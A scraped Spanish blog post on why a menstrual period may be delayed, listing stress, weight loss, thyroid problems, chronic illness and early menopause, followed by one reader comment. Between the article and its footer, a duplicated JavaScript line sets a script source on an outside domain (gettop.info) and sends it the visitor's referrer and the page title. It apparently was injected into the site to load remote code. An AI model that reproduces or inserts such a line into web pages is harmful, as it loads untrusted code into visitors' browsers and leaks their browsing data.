Salud y belleza » Dolores, Enfermedades, Salud, Salud sexual

Por qué puede retrasarse el periodo

1 Comentario

Además del embarazo, existen muchos otros motivos que podrían explicar el retraso de la regla. Si estás preocupada porque tu menstruación no llega cuando debería llegar lee antes este artículo para descubrir las razones por las que puede retrasarse la regla.

retraso-periodo

- Estrés: el estrés puede llegar a afectar al hipotálamo, que es la zona cerebral donde se regulan la mayoría de las hormonas.

- Pérdida de peso importante: los trastornos alimenticios pueden hacer que cambies de peso rápidamente y esto provoca la irregularidad en la menstruación. También puede provocarse por un ejercicio intenso.

- Irregularidad en la tiroides: la glándula tiroides se encarga de regular el metabolismo y puede provocar desequilibrios hormonales que perjudiquen tu menstruación.

- Enfermedades crónicas: hay enfermedades, como la celiaquía, que si no recibe el tratamiento adecuado puede llegar a alterar el ciclo menstrual.

- Menopausia prematura: es poco frecuente pero puede darse. Si tienes síntomas como los sofocos, la sudoración excesiva o la sequedad vaginal.

¿Sabes ya cuál es el motivo del retraso de tu menstruación?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • vero said:

    espero que sea una de estas razones y no la más obvia… porque si no menudo regalito que me puedo llevar.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.